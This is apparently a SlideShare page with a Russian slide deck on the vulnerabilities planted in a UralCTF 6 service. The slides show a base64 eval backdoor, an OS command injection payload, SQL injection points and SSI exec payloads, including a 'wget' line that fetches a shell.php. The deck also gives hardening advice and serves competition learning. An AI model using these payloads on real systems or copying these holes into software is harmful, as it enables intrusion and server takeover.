SlideShare a Scribd company logo
Отдел кадров Самый простой сервис  UralCTF 6
Стандартные пароли Меняйте все пароли, какие только возможно сменить! Кроме того, хорошо бы удалить не нужные файлы, например  phpinfo.php
Старый шелл код mysql.php: @$_GET[‘code’]&& eval(base64_decode($_GET[‘code’])); print_r(mysql_fetch_array(mysql_query(…)))
Инъекция ОС index.php: $act=@$_GET['act']; if(!$act)$act='index'; eval(`type {$act}.inc`);  ?act=add.inc && echo+ ” phpinfo() ”&& cat+add
Слепая  SQL  инъекция $ip= @$_SERVER[‘ HTTP_ X_FORWARDED_FOR']? $_SERVER[' HTTP_  X_FORWARDED_FOR']: $_SERVER['REMOTE_ADDR']; INSERT INTO `log` (url,ip,time)  VALUES ('{$url}','{$ip}',NOW())
SQL  инъекция show.inc: $sort=preg_replace('/UNION|SELECT| -- | |\/\*(.*)\*\//i','',$sort,E_STRICT); $sql="HANDLER $mysql_table READ id $sort WHERE flag='' LIMIT 1";
SSI LoadModule include_module modules/mod_include.so Options +Includes AddOutputFilter INCLUDES .php <!--#exec cmd=&quot;ls - la &quot; -->  <!--#exec cmd=“ wget http://.../shell.php &quot; -->
??? //if($info['flag'])echo '<span style=&quot;display:none;)&quot;>'.$info['flag'].'</span>'; $sort='LAST'; // eval(`type {$act}.inc`);
Ваши вопросы? Совсем нету?

More Related Content

PDF
Страх и ненависть в исходном коде
PPT
Боремся с "лишними" переходами на сайте, или еще пара слов о попапах и аяксах.
PPT
Removing superfluous page loads, or a few more words about popups and ajax
PDF
[ONSEC] PHP unserialize() _SESSION and Dynamics
PDF
Алексей Плеханов: 25 причин попробовать Laravel
PDF
Миша Рудрастых: Введение в HTTP API WordPress
PPT
Jquery selector optimization in drupal
PPTX
работа сайта
Страх и ненависть в исходном коде
Боремся с "лишними" переходами на сайте, или еще пара слов о попапах и аяксах.
Removing superfluous page loads, or a few more words about popups and ajax
[ONSEC] PHP unserialize() _SESSION and Dynamics
Алексей Плеханов: 25 причин попробовать Laravel
Миша Рудрастых: Введение в HTTP API WordPress
Jquery selector optimization in drupal
работа сайта

What's hot (10)

PDF
.NET Fest 2018. Сергей Калинец. Azure веб разработка здорового человека
PPT
лекц17
PPTX
PHP basic
PDF
Erlang tasty & useful stuff
PPT
Django South. Миграция баз данных.
PPTX
Парсер: что? зачем? как?
PDF
Почему Mojolicious?
PDF
Что нового в Perl? 5.10 — 5.16
ODP
ZFConf 2010: Zend Framework and Doctrine
PPT
PHP Tricks
.NET Fest 2018. Сергей Калинец. Azure веб разработка здорового человека
лекц17
PHP basic
Erlang tasty & useful stuff
Django South. Миграция баз данных.
Парсер: что? зачем? как?
Почему Mojolicious?
Что нового в Perl? 5.10 — 5.16
ZFConf 2010: Zend Framework and Doctrine
PHP Tricks
Ad

Viewers also liked (6)

PPT
1f5694b92ab2c96e2038b33a8b0ceb7d
PPT
1f5694b92ab2c96e2038b33a8b0ceb7d
PPT
1f5694b92ab2c96e2038b33a8b0ceb7d
PPT
1f5694b92ab2c96e2038b33a8b0ceb7d
ODP
тойрог
PPTX
Talkh yagaad huudug ve sudalgaat khicheel
1f5694b92ab2c96e2038b33a8b0ceb7d
1f5694b92ab2c96e2038b33a8b0ceb7d
1f5694b92ab2c96e2038b33a8b0ceb7d
1f5694b92ab2c96e2038b33a8b0ceb7d
тойрог
Talkh yagaad huudug ve sudalgaat khicheel
Ad

Similar to 1f5694b92ab2c96e2038b33a8b0ceb7d (20)

PPT
Yserver
PPT
Js Http Request дмитрий котеров
PPT
Интеграция Яндекс Сервер
PPT
Ubercart -nemnogo_primerov_iz_zhizni
ODP
DrupalCamp Kyiv 2011. Views - стандарт вывода списка данных. Расширение Views...
ODP
Saint Perl 2009: CGI::Ajax demo
PPT
Модульное тестирование iOS-приложений.
PDF
Cобачники против кинофобов
PPT
Perl in practice
PDF
Инструментируй это
PPT
PDF
Командная разработка “толстых клиентов”
PDF
UWDC 2013, Yii2
PPTX
Взломать Web-сайт на ASP.NET? Сложно, но можно!
PPTX
Alasql - база данных SQL на JavaScript (MoscowJS)
PDF
"Alasql.js — база данных SQL на JavaScript" — Андрей Гершун, MoscowJS 18
ODP
Семинар-практикум по Drupal
PPTX
ASP.NET MVC - как построить по-настоящему гибкое веб-приложение
PDF
Реализация поиска на Drupal
Yserver
Js Http Request дмитрий котеров
Интеграция Яндекс Сервер
Ubercart -nemnogo_primerov_iz_zhizni
DrupalCamp Kyiv 2011. Views - стандарт вывода списка данных. Расширение Views...
Saint Perl 2009: CGI::Ajax demo
Модульное тестирование iOS-приложений.
Cобачники против кинофобов
Perl in practice
Инструментируй это
Командная разработка “толстых клиентов”
UWDC 2013, Yii2
Взломать Web-сайт на ASP.NET? Сложно, но можно!
Alasql - база данных SQL на JavaScript (MoscowJS)
"Alasql.js — база данных SQL на JavaScript" — Андрей Гершун, MoscowJS 18
Семинар-практикум по Drupal
ASP.NET MVC - как построить по-настоящему гибкое веб-приложение
Реализация поиска на Drupal

1f5694b92ab2c96e2038b33a8b0ceb7d